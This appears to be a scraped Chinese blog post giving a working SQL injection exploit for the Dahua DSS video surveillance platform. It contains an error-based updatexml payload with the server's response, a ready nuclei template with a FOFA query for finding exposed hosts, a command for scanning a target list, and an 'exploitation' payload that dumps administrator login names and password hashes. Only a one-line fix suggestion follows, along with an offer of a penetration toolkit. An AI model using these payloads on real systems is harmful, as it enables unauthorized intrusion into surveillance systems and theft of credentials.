设为首页收藏本站
开启辅助访问

大华 DSS SQL 注入漏洞(附exp)

您所在的位置:网站首页 dss视频监控app 大华 DSS SQL 注入漏洞(附exp)

大华 DSS SQL 注入漏洞(附exp)

2024-07-05 02:07| 来源: 网络整理| 查看: 265

05

漏洞复现

向靶场发送如下数据包,计算md5(102103122)

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 345Accept-Encoding: gzip (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1

响应内容如下

HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 581Content-Type: text/xml;Date: Tue, 19 Dec 2023 10:13:48 GMTServer: Apache-Coyote/1.1soap:ServerPreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'

响应数据包中包含6cfe798ba8e5b85feb50164c59f4bec

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: dahua-dss-itcBulletin-sqliinfo: name: 大华DSS itcBulletin SQL注入漏洞 author: fgz severity: high description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。 metadata: fofa-query: app="dahua-DSS"requests: - raw: - |+ POST /portal/services/itcBulletin?wsdl HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 matchers-condition: and matchers: - type: dsl dsl: - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'

运行POC

.nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml -l dahua-dss.txt

07

漏洞利用

利用漏洞获取系统的用户名密码,将poc中的md5()函数替换成SQL语句即可

POST /portal/services/itcBulletin?wsdl HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1

响应数据包如下

HTTP/1.1 500 Internal Server ErrorConnection: closeContent-Length: 643Content-Type: text/xml;charset=ISO-8859-1Date: Tue, 19 Dec 2023 11:46:52 GMTServer: Apache-Coyote/1.1soap:ServerPreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'

其中system为用户名 8e173a7bb9ec8156d772cf4为密码的MD5

07

修复建议

升级到最新版本或者部署WAF进行防护。

08

福利领取

关注公众号,在公众号主页点发消息发送关键字免费领取。

后台发送【工具】获取渗透工具包

后台发送【电子书】获取电子书资源包



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3